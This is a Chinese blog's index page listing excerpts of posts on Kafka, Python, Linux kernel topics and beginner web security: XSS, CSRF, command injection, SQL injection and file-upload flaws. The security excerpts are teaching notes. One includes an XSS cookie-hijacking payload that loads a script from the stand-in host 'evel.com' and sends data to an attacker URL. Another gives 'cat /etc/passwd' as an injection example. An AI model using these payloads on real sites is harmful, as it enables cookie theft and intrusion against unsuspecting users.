- 博客(93)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 kafka简介(一)
常见消息系统kafka的设计目标kafka框架使用虚拟机部署kafka直接看官网快速入门:如何使用docker部署kafkahttps://blog.csdn.net/a2267378/article/details/88545858
2021-05-20 00:03:26
174
原创 实用小程序:pip install
import loggingimport subprocessdef pip_install(package=None, req=None, dest=None, src_dir=None): """ pip安装命令 :param package: pip包名称,或者wheel包名称 :param dest: 安装目的位置 :return: src_dir: 其他依赖包的来源 """ if package: cmd_list =
2021-04-30 14:41:35
456
原创 python class不再函数内定义变量有什么不同
总结:不会被所有的实例共享,每个实例均有一个,但可以通过类名访问作用:1. 可以看作类常量, 如A.a2. 可以作为python的描述器descriptorclass A: a = 1 def __init__(self): self.c = 'string'c = A()c.a = 4# a 本质只与实例进行绑定了b = A()print(b.a) # 打印1print(c.a) # 打印4print(c.__dict__)print(A.a
2021-04-20 00:45:46
245
原创 python菱形继承
class A: def set(self, a): print('A {}'.format(a))class B(A): def set(self, a): print('B {}'.format(a)) super(B, self).set(a)class C(A): def set(self, a): print('C {}'.format(a)) super(C, self).set(a)
2021-04-20 00:27:30
202
原创 python回调保留状态
使用类实现from multiprocessing import Pooldef add(x, y): return x + yclass ResultHandler: def __init__(self): self.sequence = 0 def handler(self, result): self.sequence += 1 print('[{}] Got:{}'.format(self.sequence, r
2021-04-19 17:01:37
105
原创 python定义函数接收json参数
直接上代码def func2(*args, **kwargs): if args and kwargs: raise TypeError("jsonify() behavior undefined when passed both args and kwargs") elif len(args) == 1: # single args are passed directly to dumps() data = args[0] else:
2021-03-07 21:26:15
646
原创 linux内核7-系统调用
文章目录1. 概念1.1 ABI与API1.2 系统调用与中断,异常比较1.3 调用流程1.4 调用流程优化2 实例-日志收集系统2.1 内核编译2.2 内核模块2.3 测试内核模块1. 概念1.1 ABI与API问题: 保持一个稳定的 ABI 和保持一个稳定的 API相比,谁更困难,为什么?ABI: ABI是一系列约定的集合,可以说调用惯例(calling convention)就是ABI。因此, ABI是和具体CPU架构和OS相关的。具体而言, ABI包含以下内容:1. 一个特定的处理器指令
2021-01-26 00:46:17
318
1
原创 linux内核6-定时器
文章目录一 概述1.1 运作机制1.2 时钟架构1.3 函数执行一 概述时钟中断: 周期信号,引发CPU中断行为,相关硬件实时时钟RTC: 长时间存放系统的时间设备,即使睡眠也会计数可编程间隔期 PIT: 周期性发送时钟中断信号,tick时间戳计数器TSC: 时钟信号到来,自动加1(64位)高精度计时器HPET:CPU本地定时器: 单次或周期性产生中断系统高精度定时器 hrtimer: 提供纳秒级及精度,精确时间迫切需求jiffies: 计数器,用例记录自系统启动以来的节拍总数x
2021-01-23 20:19:45
144
原创 linux内核5-中断
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录概念1.1 中断机制与策略分离1.2 中断子系统1.3 中断向量和描述符表中断处理机制2.1 中断描述表初始化2.2 中断处理过程2.3 中断请求队列2.4 IRQ数据结构从异常、中断,系统调用返回代码分析中断返回中断下半部分3.1 软件中断机制3.2 时钟中断tasklet的使用概念中断是CPU对系统发生某个时间做出的一种反应(`what`), 中断的引入是为了支持CPU和设备之间的并行操作(`why`),CPU在收到中断信
2021-01-18 01:44:15
413
原创 白帽子(6)- 造成文件上传漏洞原因有哪些?
服务器配置不当当服务器配置不当,在不需要上传页面的情况下便可导致任意文件上传,如开启HTTP PUT方法;开源编辑器上传漏洞…文本文件上传限制被绕过比如客户端做了限制,但服务器没有做,那只要修改数据包即可绕过过滤不严或绕过过滤一般采用黑后缀过滤, 如过滤php, 但上传php3后缀文件解析漏洞导致文件执行存在此漏洞时,及时合法的文件名,但文件名中的恶意代码也有可能被执行。比如read .txt文件,却执行了里面的脚本命令;文件路径截断如0x00,?, \0或超长..
2020-12-20 16:00:00
2132
原创 白帽子(5)- 命令注入与代码注入区别
命令注入当应用程序需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数,如php中的system, exec, shell_exec等,当用户可以控制名利执行函数中的参数是,将可注入系统名利到正常名利中,造成命令注入攻击,如system(args), args= ‘cat /etc/passwd’;代码注入应用程序在刁永杰一些能够将字符串转为代码的函数(如php中的eval)时, 没有考虑用户是否可以控制这个字符串,将造成代码执行漏洞,如(eval(“args”)); args=‘.
2020-12-20 15:44:26
1063
1
原创 白帽子(4)-csrf,ssrf, xss的区别
XSS攻击过程攻击者发现xss漏洞 → 构造代码 → 发送给受害人 → 受害者打开 → 攻击者获取受害人的cookie → 完成攻击攻击者:需要登录到后台完成攻击CSRF攻击过程攻击者发现xss漏洞 → 构造代码 → 发送给受害人 → 受害者打开 → 受害者执行代码 → 完成攻击总结: CSRF攻击者只负责构造代码,攻击由用户实现,CSRF少了cooke获取的步骤,为什么少了呢?因为受害人在执行恶意代码的时候就已经外成了攻击,而攻击者并没有参与进来...
2020-12-20 15:35:17
518
2
原创 mmap为什么更高效?
mmap是一种内存映射文件的方法,它将一个文件映射到进程的地址空间,建立文件磁盘地址与虚拟内存的一种对应关系,如此,读写相应的虚拟地址而直接读写对应的文件内容了,这样映射的最大好处是进程可以直接读取内存,避免了频繁的使用read,write等系统调用。这里需要注意:mmap并不是直接分配内存,它所做的最重要的工作就是为进程映射区的虚拟地址建立页表项。从下图可以看出,应用程序虚拟地址空间有多个区域构成,mmap映射的虚拟内存再heap和栈之间的空余部分。...
2020-12-12 17:03:13
675
原创 内存1G malloc1.6G是否成功?
在物理内存为1G的计算机中,能否malloc(1.6G)的内存,为什么?编写程序,实际验证是可以申请成功的,也支持正常读写,原因:malloc的申请的内存只有在用到的时候才会通过请页机制放入内存中,且可以只存放部分内容。此外,如果写入后面的内容是否成功会触发交换机制,腾出一部分内存,继续进行;具体原理见:https://blog.csdn.net/CPriLuke/article/details/111026195#define SIZE (int)(1.6 * 1024 * 1024 * 1024)
2020-12-12 13:42:51
644
原创 linux内核4-内存管理
内存管理导读一、 进程空间1.1 进程空间布局1.2 进程空间数据结构1.2.1 mm_struct1.2.2 vm_area_struct二、用户空间管理1. 创建2. 虚存映射2.1 VMA新建方法2.2 虚拟区实例2.读入数据5 总结1 参考资料导读lscpu命令查看cpu结构, 就看到linux内核缓存,[root@localhost ~]# lscpuL1d cache: 32K //1级数据缓存L1i cache: 32K //1级
2020-12-12 13:30:16
511
原创 linux内核1-hlist pprev为什么是二次指针
理由:这样hash数组只用占一个指针 如果不是pprev, 插入头节点就需要强转下面给出示例#include <stdio.h>struct hlist_head { struct hlist_node *first; };struct hlist_node { struct hlist_node *next, *prev; };static void hlist_add_head(struct hlist_node *n, struct hlist
2020-12-09 23:40:17
374
转载 linux内核2-内存寻址
查看https://blog.csdn.net/qq_34258344/article/details/95519020
2020-12-09 23:35:18
96
原创 linux内核3-进程管理
进程概述状态转换#define TASK_RUNNING 0#define TASK_INTERRUPTIBLE 1#define TASK_UNINTERRUPTIBLE 2#define __TASK_STOPPED 4#define __TASK_TRACED 8...进程亲属关系树形结构体real_parent 创建当前进程的进程, parent相当于养父, 比如:父进程销毁,子进程归init进程管理;线程组: 一个进程创建多个线程, 线程才是内核的调度单位, 线程
2020-12-09 23:27:21
173
原创 白帽子(4)- xss payload
xss pyload直接参考:xss pyload攻击语句汇总cooke劫持一般放在script中。# 远程请求xss 文件url: http://a.com/test.html?abc="><script src=http://evel.com/eval.js ></script>"# evel.js的写法<script> var img = document.createElement("img"); img.src = "http://ev
2020-09-21 16:08:11
298
原创 白帽子(3)- xss反射与dom攻击对比
Dom XSS攻击关于xss攻击的分类可以参考以前的文章:xss分类,注意:对于DOM XSS类型的攻击与反射性的区别在于:DOM XSS是javascript处理输出, 而反射性xss是后台程序处理。示例与pyload如下:<script> function test() { var str = document.getElementById("text").value; document.getElementById("t").innerHTM
2020-09-21 16:07:22
2244
原创 使用dnslog进行sql注入
这里主要是补充一下ADO老师在对dnslog进行注入前,对于dnslog的补充说明:首先登陆http://ceye.io/注册一个账号,并进行登录,登录后在http://ceye.io/profile获取你的域名和token.测试自己的dnslog是否正常, 直接在网页发送http:在dnslog的http请求下查询是否存在有该记录:...
2020-07-12 16:55:10
684
原创 sql注入-回显注入实例详解
根据前面对sql注入流程的说明https://blog.csdn.net/CPriLuke/article/details/106961748本章主要对说明的内容通过实战的方式进一步加深,实战环境sqlilab,hackbar1. 寻找注入点通过注入单引号后,网站返回sql报错,确认存在SQL注入,且得知数据库的类型为MYSQL2. 确定当前数据库的列数通过order by进行试探得到,如下所示,当为order by 4返回数据报错sql注入语句说明,后台的原始数据为:select *
2020-06-26 09:56:06
1532
原创 sql注入-基本思路
环境搭建# docker搭建sqli-labsdocker pull acgpiano/sqli-labs# 运行sqli-labsdocker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs # 点击进去后reset 数据库sql注入流程1. 目标收集无特定目标: inurl:php?id=有特定目标:inurl:php?id= site:target.com工具爬取:spider爬取2. 寻找注入点寻找注入点的方式主
2020-06-25 23:31:29
892
原创 白帽子(2)-浏览器安全(同源策略)
浏览器安全章节重点是介绍了一下浏览器的安全功能,并列举了一下功能:同源策略同源策略(Same origin policy)限制了来自不同源的document或脚本,对当前的“document”读取或设置某些属性。所谓同源是指:域名、协议、端口相同。另外,同源策略又分为以下两种:DOM 同源策略:禁止对不同源页面 DOM 进行操作。这里主要场景是 iframe 跨域的情况,不同域名的 iframe 是限制互相访问的。XMLHttpRequest 同源策略:禁止使用 XHR 对象向不同源的服务器地址
2020-06-21 16:11:02
444
原创 白帽子(1)-web世界观
基本概念安全问题本质是信任问题设计安全方案的基础都是建立在信任关系上的,我们必须相信一些东西,必须有一些基本的假设,安全方案才能建立。安全是一个持续的过程安全是一个持续的过程,攻击方式在变,防御方式也在变安全要素CIA名称英文名说明机密性confidential要求保密的数据内容不能被泄露完整性integrity数据不能被篡改,是完整的可用性availability保护资源可以得到,DOS扩充的一些要素:可审计性和不可抵赖性
2020-06-21 12:02:58
361
原创 python数据分析-第三章
二分收索import bisect c = [1, 2, 2,2,3,4,5]bisect.bisect(c, 2)enumerate遍历一个序列,同时需要序号some_list = ['foo', 'bar', 'baz']mapping = {}for i, v in enumerate(some_list): mapping[v] = iout: {'foo': 0, 'bar': 1, 'baz': 2}zip将列表,元组或其他序列的元素配对,新建一个元组构成.
2020-06-14 14:59:54
328
原创 sqlmap 抓包没发现sql注入语句
原因:sqlmap中的.sqlmap目录下保存了上次信息, sqlmap再次探测直接使用了上次信息解决办法:rm 删除上次信息
2020-05-01 12:30:51
436
原创 web安全-SQL注入漏洞入门
SQL原理根因:服务器要执行的数据库代码拼接了用户输入的数据危害:被用来获取数据库敏感数据(拖库)SQL注入工具sqlmap --kali有现成的支持数据库多支持多个字段cookie, args等字段的注入#如何判断一个注入点: sqlmap -uSQL基本流程找到有数据交互的功能的页面,一般是一些脚本文件判断页面是否存在SQL注入在url...
2020-04-07 00:00:15
192
原创 web安全-敏感文件探测
常见的敏感文件类型网站管理后台:找到网站后台位置后进行口令爆破数据文件:如http://create.sql 获取到数据库文件备份文件:格式如wwwroot.tgz等网站备份文件webshell: 已经被攻陷的网站上的后门脚本如fuck.php, c.php等...
2020-04-05 18:25:09
732
原创 vscode Ctrl+Shift+E失效
原因:查看快捷键是不是与其他软件冲突,尤其是搜狗输入法,微信之类的软件。我失效的原因就是与搜狗输入法冲突了, 如下图,取消掉快捷键就好了查看自己是不是修改快捷键Ctrl+shirt+P 搜索Shortcut查看, 这个就不多说了...
2020-03-28 10:57:14
1747
原创 网易web安全:课后问题-CSRF
什么是CSRF利用用户已经登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作CSRF攻击原理用户登录web网站,此时浏览器含有用户登录信息黑客构造恶意网站用户主动访问恶意网页,转账到黑客用户。**真正完成转账的关键在于:**浏览器cookie存放有用户的登录凭证,当浏览器发送请求时,会继续带上已有的cookie恶意网页的构造技巧: 含有攻击的网页不会显示任何内容,只...
2020-02-23 11:25:12
320
1
原创 安全开发工程师-常用网站
开发相关linux库函数:http://www.qnx.com/developers/docs/6.5.0/index.jsp添加链接描述C++ Referrence:安全相关学习平台: https://live.freebuf.com/添加链接描述IBM漏洞知识整理: https://www.ibm.com/support/knowledgecenter/SSB2MG_4...
2020-02-21 19:30:36
353
原创 网易web安全五:课后问题-xxs
xxs概念黑客通过“html注入”篡改网页,插入了恶意的脚本,当用户浏览网页时,实现控制用户浏览器行为的一种攻击方式两个关键点:html包含恶意脚本, 黑客获取到用户cookie常规工具:在查看前端攻击时,可以使用firebug进行查看hash数据比如下图:当加载一个img失败时,执行onerror事件从而执行xss脚本xss分类**存储型:**需要经历两个步骤1) 用户将xss脚...
2020-02-18 01:03:14
274
原创 网易web安全:课后问答-php
什么是php?php是服务器后端解释器语言php变量中$_POST $_GET $_FILE 用法如下面截图中用法php include的用法include xxx.phpphp 如何操作数据库百度一下就可以,easy...
2020-02-16 16:34:54
167
原创 网易web安全五:课后问题-SQL操作
phpstudy 如何运行后台mysql找到mysql目录将bin/目录下的mysql.exe拖动到命令行后,输入如下命令:.../mysql.exe -uroot -p[yourpasswd] mysql常见的内置函数主要记住:select current_user; select datebase(); select load_file('') #查看外部文件 select ve...
2020-02-16 15:54:02
208
原创 网易web安全五:课后问题-web服务器
web的动态页面大致解析以php语言为例:请求-web服务器-php解释器解析php文本-数据库查询返回结果-解释器生成html,业内相关网站web服务端包含哪两种服务如上图所示包含:web服务和数据库服务本地访问,四种访问网站的形式有哪些?本地主机:localhost127.0.0.1本机IP地址域名,需要修改hosts文件如何运行一个简单的web文件将html或ph...
2020-02-16 15:19:19
228
原创 网易web安全四:课后问题-javascript
在那些地方使用javascript简单记忆: 如何获取html的内容,这也是dom的作用如果是写入就是:document.wirte(), 链接写入图片:document.write("<img src = 'https://pic2.zhimg.com/v2-7d1f94a55f2aea205ca6f195c557a041_250x0.jpg'></img>")...
2020-02-16 14:06:45
219
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人